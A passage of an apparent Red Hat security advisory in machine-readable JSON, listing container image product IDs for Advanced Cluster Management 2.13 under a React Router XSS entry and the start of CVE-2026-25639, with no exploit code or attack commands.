"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:83bc597e83bd0756afa67adcbd50858b0d1c23f87b572706e9059dd26055b4a0_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:a5ccbff1ad0a3001902044e52590ee18508632bce7822ebf54ba521eaae180eb_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:db8ed91f54d683d9d3be3b0747f7429eb95accc8802593dd61d8c24e8a1facfb_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:f3d2daf907e6fd32654d1458c60b134f4d938a933e53161e588bcd94ff6b01df_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:0aa9df5f5bf523f7d6d4a9e931a1932e62056d942bf86396d33874adc85a91e8_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:4d0252b36a0ca8f522e60e400463b22de506766bdf0c1f65e3e289a3c93002d1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:701bc2dd0a441216ea138b677dbf71d497d9b7acaad5f48661117008a8e5defe_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:b30887b0c8fb4292b6c87ef681761c18a112e0113647e2bde86c04c13f59b7a5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:6b65f79a765b69a84ac5924280e9f6d55875b8aceb6ae97f9a75cb6076bd074a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:6d410e7e4de91970f44368e5cc1ce1ac83908550785263342f6038a988be30e4_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:736631a4d89bf44078b7f180ddcd474655d66ed43b85a4a79258eab9348656ff_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:ca58b27ea6673f0c506ed1ffad51918608a813dabf58f4845ab97d6e9f2c11d3_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:21f6d86d21be3a9541fc577a647d8f38b81bca975dc82d9506056f44e6a35443_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:60a3e7e83d189003d185e2415f96b4f3be0912e4cbaa96ea4ed8ebcdce5cc1d0_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:796abebd9573cacba87eb0c6497ed9617047eddba90f1c4b8237964ed954328d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:d130f2bb5b047483504d5c8113e0449983e79c49e8bda97b5752862930a91947_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:0a98f4d3e54b7410bfc1601f2ee2ba1308f30e40314bfc5169c3d99c3b8dfaa1_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:3148a9662d732bbad15d6bd89cce43a886cba68ba1cefcef55f7bb65d3159432_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:33c37b7bd401cfcf46d5cb42173fe3697a0649dc1080255dbd6243d4bfe8d08f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:cf1c1c1c778cafe6067df490969aab89a6b3e43487d954bb24b1409bc22f1091_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:118fe4fc31cb7818cda240c48628e5a3d43002c271fa7ba45d9631b7a6ddb8e2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:a2e5353298e0b0e46516d5127d0da65fcb5ac4498651693f347de1eb18e12095_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:b10f9f52f0665ae2a8bb4bf2649aa6e3d1185a0dffb9ebeb11a8900174df5ef2_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:c2bfb459d7442878d591cc31436830b983fe30dcfa6f7d383cc91cb32e42fa7c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:55320965b17fef48e776d39c548f0bf81a1e9239ee4b90a032f4b111e8748d2f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:a36bcef862d0e3cc972c9eb2c0d80311030659c13de6acab7e353905ff5eccff_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:c7bfe530a7efe66f5c3e2e08b114b3b9e44072e3609725663d6a5f3945bda512_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:e73d91e157c13ea96615fc060f5312997203f6b6350d335917b2feacb96c9ca5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:2003587575e18b2e6b9bf3617c65e0f83ebc8cf30daf6dd241500cd1555820e0_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:6098254a7e2fdd67ef1773abda74d3dde3d31e59254f4a1cd5e77dc34d224602_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:7fa35da009ab6e41177f0589f6d3fbf1bbe3fff4b52add3bfbc516a046e35640_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:9418993b725bf813959ed5adbd21690ee2cbeeac3d56c7ab6805c3eb29b5d46f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:14fb16412dea57a775e95954c3a07a77de846f851935629bf9bfdbcc46a70f4f_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:40f8ad6430cc767b56992722d5890f98882c7372950320d28e808c18714b7179_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:c227f25ae401af3eba9352765f906c8b873370485a7c748b1602e53c0776f90f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:ffb3e3cd6764e802b5e9f87034548f96dcacfeedd8fe2b3b21b06c41734e8320_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:24df1e0d7850220df3aa658c6056f81a68fe451ffd99e4d0dfee07cebe9c3782_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:25fb42a78847235c61e35f66a6e02dfee5fc0b6832aa4ce06c3c6f395b95b36d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:9e19fc6fd3285c1833cd97eeef10cb179fe9705dea9b3f912052207b3a2daea7_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:edc8b960038279c012c5aa99917361ad0888b0195c3ee9adb368b798a5bea2fb_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:231caddbaa1b499fae4efbf34c839941e595f242d12e22378e210b47de6262a8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:450199903a5d88d10b107768839780fbd0ee15535c6a998a0cac5bec942dd414_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:7fe0726987e478ed3da6d9b1eb4b611461e285ada827de6a186b95bc75a36c73_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:8d8eb1e5a21a37f041f60fbd624c7861f2e726997c6ad1d5279f59a7c849f2af_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:1628ce0aab57c09dad7f5b2a24bf664de71b76a38cd05ccf281bb8cc8fc5859e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:7e3f01077df87eb91ece7c2bd6cfa2c15a0044c2f9c40efee9ce1bf14a6807b6_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:9bc74577f0edc3045a1a027c0f8652cc904fc3b9397dc9af10576f9dfcab2080_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:e9cab985b52c8f23b62cad3ea9c692e321a5347bd06fc56b19dfdb1801030567_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:01778cb2a2b9771a03ed8c7feb5b94a23225f60f4e49263e71dccd017cfd1164_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:0e4525617200428a5510108b0a0845fde43fd4e64804186af045df9680ca05b7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:903c920eb068fcabdd16fb95f78902107892efa8e8a1ddda124d7f6bc1afdcd8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:ac486bf6a84c573a9774aadd4ea995a551c0abcbfb42dbbb71dc03e6c900a211_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:61b112b8ebb2ca4e41f5ee4b0c09ad0b53c3a6b60297fb8c1f158c28a8f10b3d_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:6bd79f2c4c516adc626c73dec28892cbeab65e349dff8f1fcb11d7242b614805_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:c920a77dcf02347d116035d5cfef1a365e02022713788a14045a9be2a1bd1c5c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:eb7788d29142ad36cba099b1dcebe3eb1c28366f87f611ca4d0b375bc7f4b19d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:5b7668d6f3b7fb994c4bbbb86bdb92d4258b88ab92337394b66058255c048ad8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:64930ec82f003294eaf26f6ac59c493e1bfc8c3d7addeb4c5b8f0cfcf458c406_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:753415fcdcc9f6b8685a54d83f4d35d1104d690215125a36d6df2b9873ac6cd3_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:c58049e17034c0df635df55fce49cab392af3194f57c03bbb842d7c2acb247e5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:0907a51a72f39393da4bdee241333b08b5b5591f1e9a5de7d67ad586d11da59b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:498cdf1888c2ef9f031baafc288323ebd0fe5d9b009cedb1443605cf4153c0c0_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:5ac47e52a78f31b8982de5b9144ec96baab80c78ba8d06d3efabda329e017d36_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:9819517abcb75b516ea0e158ad9cbb0a4ef847f7858531b751c04de5a53527be_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:2ae0730de393d5aeff08a9317fc70459421dd8d6fc7a65f2a9e4a28ae5b64d9d_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:62c7b78b2726fd940db4bd435b13f6d07097395b069130b32ea0912c95333555_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:8c986374ff8afd980f450877facc2927fdd6f655f3d6b7def6771485d00afeb1_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:8eeb6a344b773bdc4f50da36c956dbaa50d6474f5c045e92250274d0ed723b39_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:1d7f37fa0146f48291fd1dd12752d0a19c8e87c30e1698492b36274c79051a9e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:5c3cc196a8638f6fae7c246ff6746f2f453bbfab8e018683ee297609713664ac_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:e539ec4ab10e81c08d68991e3c77efd43497f4a5561ee1315ff8d467736d245a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:fbc20e8545d4562d05df98d5cfbc91a7a2d802a9d4ff8c0ea733126687c42c26_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:111bbc8fda153d16c384a622dd659c53b8cdc47e495a9fada411a5042954ab6e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:433f0b3d09889613d5214ba1c084bdc99bdcbce227fefd10b0d8491442698ea9_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:51096baed7d6ed403d88ac2dd935a30313f618b7552fee2b07367db5069601d1_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:b3eefeffd90660b8e463f2b06dc5ee2b46e235efae7c13ed893828a6c9598459_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:58a8acff99aaaacdb7c292b615c2ed9a0418d82f75273c1809a6db05811713fa_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:661a4a1fb71f36ac1663232ca6e098d1c101dc16168eec7eee471ae11f98f66c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:bc06192ce81eac533cb7c080e8aef6587991534cb9b1787537c49753c0985e3d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:e8207895ec9e7006746043cf04fbf1e2897aa30e74b9184665be2ac50f9fe650_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:3074a430dd8bbb0399ce649186cb6140d8525e5b7c1e05b79a4ab74a32d989b8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:34de933b36ee01444cdf4d4a45e47466ef8dad6ab6345134524595c191928ffe_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:8a65d646180c7889d0ba1e3a11fd6796d0020301e4e721575f87585afd8f9dfe_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:cf1b6cae5a10aec88554e71be094737b0a17efb07cd1175ca55f1799626f58f2_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:036ee3882d4d6536c309d9aacea3dc611785deba3bd998092adcb1ba21664897_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:82914e82513e2f8522589886a5df6681d12c6442ff1b8ef05a21d31c09fa0f0d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:893831b7270214137b2fdf1e55f0175b4ef6de9b8763eaaf0e0a935c8ab1744d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:d6e329af2d9c1648006e3fa0b0232562a2bed6e7a33c56e025517f7d9068b5cc_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:131918c9878d040c3ec190a9c724a65dbf3bb27f55a0fcac250d92067dc69288_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:327af8db145b9bd6ada1c9f27faa493ce090af412c51dedd7b247e65dcad51fc_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:721ebc57b91b4f9bcfb25d7b29ee8a2ca60fcb231096af2812f9201778e3ca51_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:ebff3dd368f33d1aec215b947b88f4aa7e821db1577d448b8c6eb4e6ead7fe07_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:6a88ce891e0fc9619e983a5b63fef86f735b8df5eb56909075bd3bbb098dddf8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:7485348cced991c7a4399e21e077ed62b3a118b7093bd4f42f9863d9e0da5c26_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:b8d70910405eec4d886b27fc348a982c0b6f906f7f0e65aceecffd9f09fd6602_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:e63891386bfb191cd0e74884cad1f86c462d57e51b9aeec7d9c5073ba4d723f9_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "@remix-run/router: react-router: React Router vulnerable to XSS via Open Redirects"
},
{
"cve": "CVE-2026-25639",
"cwe": {
"id": "CWE-1287",
"name": "Improper Validation of Specified Type of Input"
},
"discovery_date": "2026-02-09T21:00:49.280114+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:01382838a23f75a6c03b30c68e9e42d72c22d773a4891260c639f7c8b60ffd87_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:1c74aaa66b6be9f5eb1f55851f1cc3f2a3878882c3fc972cd24232e9022f74e2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:696d1f7c4b5415e49760f7a66368aa0260284b12b108d5feb560838a9bce8a6f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:7328602aa637f1b555ecd56c05d6ade8dbee48fae78a0118b1e39774b8383704_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:3ae25beb920ec77de14769895f60da6a3d83fc41192ca5da5f976076853e5a50_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:c9bf774dfa3f5a66339a86f22961c54b2b41199efd173b016a2c7c57407dae40_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:d1cac9d50ec20e770ae41aa8f90474c269d80e84a9990e2c3e613a892b0c044c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:ddb5d8c476bcc9b6d4a7c0d116a2f5150acbfa80cc890d77d5d90bd496a7860e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:0ffd5a902860aad15377e20b1e6481e6cf746fa3e33509df0f88f93f9a9f8034_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:abcf4d6f42dec254d8b4197282fb449daf13d4724ed23ddc2aafde0328338f74_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:b6ea1f6389ad207c45321ab5a36c03949986e74ef9dbf5e3d2fdb2ceb5c4a602_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:e126327d69e48f2844f5beafc34514d31e9f3eed0ac393399edf80cf31a2eabe_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:0f7b1ee143f154e6e33c452f95fd0a0afb7fd020e758a991d18abde990e49e0c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:6363dfb96f394aef2b07b3a36c85d3af60dc3594ab615327176ba520704a4356_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:849cf23afa514a1d86073fed2424e487893655510721a0b9c0d4be4cf59bf60b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:a8843c7b628767803f2aa4b2658dc0a932157b20f98507004929036108c7dfb2_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:428a52072881ee7714539f7721313ca78e06fd0e39ceb8de12f8a0d33fb4cd55_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:5145c15e9fa57bdd1d072e7c88f27d5f8f51caf395e542ad8fb54a098f8c24fb_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:cb76c81b895dfb5bc384407baf76c5c74d9b509342e665f3d5ff234a40f16236_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:d7dae765d402cd9522c23689fc0e72f47659fc2f1184b8b16c51b6c5c6a2b890_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:5af546f1d36b01b320fd950d227cdd8f62a765facc8614ba277fe218c5649e61_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:921a7995304e4648ac2fd0c08bec7d95adc09caca4d6d124cbba4ff8043edf19_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:a0928fa238b82f2c00778064d0f1e52ff507ffef7a0a3756b1f2f2022d375e4b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:fdc436ea03cb2d06976da109061aa0793672c306deef23708ee9e0b39395b6f7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:2adb87f4433d9516e2111150bccafbbb8dec179bdf3fe3acd38d7b27411cb666_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:4afad9568dc7dd2d90c396d08d596258e813bb67e2901135b539f279af382e09_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:508d4d8ee312e8d720eeca38f3823438548c5ab1260d8fa822ca49765f7aeef5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:a31ab1ae8b4c3ead24f9ce3c913a4754972bd548d6e5b10ca22e61a6d9d3539a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:35ba01a14b8f7a0ed0e79fd9efe48280d26afa10a316daaec512f39cc6839adb_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:384d23bb3f4e6fd2425e1b60ded99f027dcbaad14e631ffbe84845821a1c3215_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:a8ca367caa43ec006811fe370fdf440328dd22fc39be11e48f36396b781f36bb_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:db8b5776a9dcb4b87a4de948c4c11d0164e66df188f97be6a6fd7e9953f5501e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:1e0a1eadbb77f4f14d48357af6a5b12406ae912210b53c14018b642e4f62d1fe_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:4816e73043b8f73143cff29cff41292e62bb36467ba28a260ee46fd43ece915c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:71d6b8f5471d7a23918763eeea53d991d98adf170e228348b77d2412ce752751_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:87f2e1ee942b226835c97b7abe43a62802146755141a850137b9ab03dd6fccf6_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:2b6a43ae23126321b9c94b37da646db4943331200434edc6a54be156150065f2_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:d24283b13f739561fae6bdfb730922a1d3804422dc41249e33e6084158afcec4_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:e9df0b0323447cacad8942ecce2e690a9f498d5cb41b54e3bb55be6614ddaece_arm64",
